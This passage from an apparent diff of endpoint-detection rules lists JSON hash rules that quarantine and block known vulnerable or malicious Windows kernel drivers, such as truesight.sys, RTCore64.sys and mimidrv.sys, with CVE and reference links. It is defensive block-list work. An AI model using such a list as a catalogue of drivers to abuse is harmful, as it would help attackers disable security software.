"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481486Z", + "creation_date": "2026-03-23T11:45:31.481490Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481501Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2662c1709399ffd679f23a71fc51ceae58948add2f5bb6f61550f348211d54ef", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63689efd-74b9-5d34-9dbf-4e2cf876b2d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159827Z", + "creation_date": "2026-03-23T11:45:31.159829Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159835Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d8119e6113e7959f975cb880c93f6a684f465811c4a250a43ad0b6bba88d9e0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "636a702b-ae92-539b-a49b-65b37bdeb960", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817574Z", + "creation_date": "2026-03-23T11:45:30.817576Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0584520b4b3bdad1d177329bd9952c0589b2a99eb9676cb324d1fce46dad0b9a", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "636ce957-5f13-5d12-9809-2ef587b0a43a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488569Z", + "creation_date": "2026-03-23T11:45:31.488571Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488577Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9c3d1f24b6d9f8bc53e7fec105ace9ce71e934ad84b79ab72c96364131b575d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6370e251-bd39-5a56-a901-566e908e40ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.479172Z", + "creation_date": "2026-03-23T11:45:31.479176Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.479186Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2cccda46ceddaa78ce1cb5a5fa2e0ff6d83a6f1f7fe8d1c26eff2a0cd539cf92", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "637bd7f1-a372-5468-b23d-6cf9b9c61705", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618477Z", + "creation_date": "2026-03-23T11:45:29.618479Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618485Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c8cb72b9a011b60b1b9caea508b26fbbd95a1e3634af66082417381fe6544fb", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "637e8c32-1166-5bf9-8645-a58a5bdeea7b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + 
"id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820081Z", + "creation_date": "2026-03-23T11:45:31.820085Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820094Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a55279e70f331ddbdb8d52f9b1e3af5a3462c589966283b9754cfe09821cb538", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "637f4dff-c6a6-5186-ad34-4189d9d80aa6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471379Z", + "creation_date": "2026-03-23T11:45:30.471382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471392Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "21e6d9229f380d5e9591beaa82bd93547f517af90707d7757f0e27ff4731b484", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) 
[https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63933b68-cd81-5626-beb1-1b23ff70e5ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.971655Z", + "creation_date": "2026-03-23T11:45:29.971658Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.971666Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a166e70dcaf3ef12836db1927953ee528e532cdae8165e67d776971e4cbc48c", + "comment": "MalwareFox AntiMalware Vulnerable Driver (aka zam64.sys and zam32.sys) [CVE-2021-31727, CVE-2021-31728] [https://www.loldrivers.io/drivers/e5f12b82-8d07-474e-9587-8c7b3714d60c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63954bab-0515-52c2-8fe6-28ee216a9c6e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.143892Z", + 
"creation_date": "2026-03-23T11:45:31.143894Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.143899Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bca0038cf1d952db22d8b201dec2e4c4eeeceff4b0cbb9d81974027ae4646fa2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "639fd72f-6e56-5797-9854-c2b1ecf5a44f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607491Z", + "creation_date": "2026-03-23T11:45:29.607493Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607498Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1766fd66f846d9a21e648d649ad35d1ff94f8ca17a40a9a738444d6b8e07aacb", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63ba3797-dfad-5f76-a4b9-06fb1238c48c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980081Z", + "creation_date": "2026-03-23T11:45:29.980083Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980088Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a720c9a95ab33b29c19fc37fed2b4d2079a2e4b9bd861d406043bd6010fc4d71", + "comment": "Malicious Kernel Driver (aka mJj0ge.sys) [https://www.loldrivers.io/drivers/412f4aaf-5525-458c-b87e-311e504b856d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63c91180-20ca-5c75-a622-0b2273810e91", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827179Z", + "creation_date": "2026-03-23T11:45:30.827181Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:30.827187Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "582b5a3d15aaed4d078c45b9ecd7812d5df987cda6de4c7e9fd9bc31c066679d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63df8fa9-a7eb-5351-8f05-29de8568b1b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465141Z", + "creation_date": "2026-03-23T11:45:30.465145Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465153Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b2486f9359c94d7473ad8331b87a9c17ca9ba6e4109fd26ce92dff01969eaa09", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63e2c42f-9db3-5a3c-a30f-d7511543b152", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974000Z", + "creation_date": "2026-03-23T11:45:29.974002Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d783ace822f8fe4e25d5387e5dd249cb72e62f62079023216dc436f1853a150f", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63e9c232-f698-5369-8865-0c034890a840", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481583Z", + "creation_date": "2026-03-23T11:45:31.481587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481597Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"f0f87e224d93bcee82e751f24912a8000e9e650b4a5e34cd4516433d3b498736", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63eaa8d7-a42f-5ba6-9d40-c97f6d254deb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465001Z", + "creation_date": "2026-03-23T11:45:30.465004Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465013Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "083f821d90e607ed93221e71d4742673e74f573d0755a96ad17d1403f65a2254", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63ed6003-d2d9-5761-b2b3-37cd16fc0bd6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" 
+ }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983050Z", + "creation_date": "2026-03-23T11:45:29.983052Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983058Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36861bb32abd5ba7955aa69269d27772f75d0306485d10ed045125816422c423", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63ee4378-cab2-54b6-8d2c-a992824b9fd0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823659Z", + "creation_date": "2026-03-23T11:45:31.823661Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823667Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a7f423e5a686a7114cfb5cf6a6070064fafd11cbc2337000c8c14c1f33ba256", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "63ff631e-12b7-56ce-be8f-042c3d867eca", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149563Z", + "creation_date": "2026-03-23T11:45:31.149567Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149576Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ad0de41b0a8f65fd1e8a07f3ba20e2a833f195f31ad4706da7b74a6fb04f3a91", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "640594d7-4a65-54ec-9f77-847d3b4c01ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160304Z", + "creation_date": "2026-03-23T11:45:31.160306Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160312Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "344b57aa48f2ef39cd7f1be46946c7d86c6f6ea0e018a4cc6033587cf366b299", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6414090d-24c6-5d87-9fdf-888a0f4e4a78", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.474121Z", + "creation_date": "2026-03-23T11:45:31.474125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.474135Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d6f6cee30083462666718fa3cf9e83371a5df3b0826328122fa5497270ea605", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "641b611d-ffb0-5be6-90e7-7b6916bdccc6", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974856Z", + "creation_date": "2026-03-23T11:45:29.974859Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974881Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6d6fe20c9f7ccfe723bf7feecb5acf773a85cb61286452dc4001589f82b1a424", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "642dd934-687f-5cb8-bc6b-9ab5f3fb6c17", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983772Z", + "creation_date": "2026-03-23T11:45:29.983774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.983780Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5b0772be02e2bc807804874cf669e97aa36f5aff1f12fa0a631a3c7b4dd0dc8", + "comment": "Vulnerable Kernel Driver (aka GLCKIO2.sys) [https://www.loldrivers.io/drivers/52ded752-2708-499e-8f37-98e4a9adc23c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "642ec52e-34b4-59c9-89df-11ad44572906", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475562Z", + "creation_date": "2026-03-23T11:45:30.475565Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 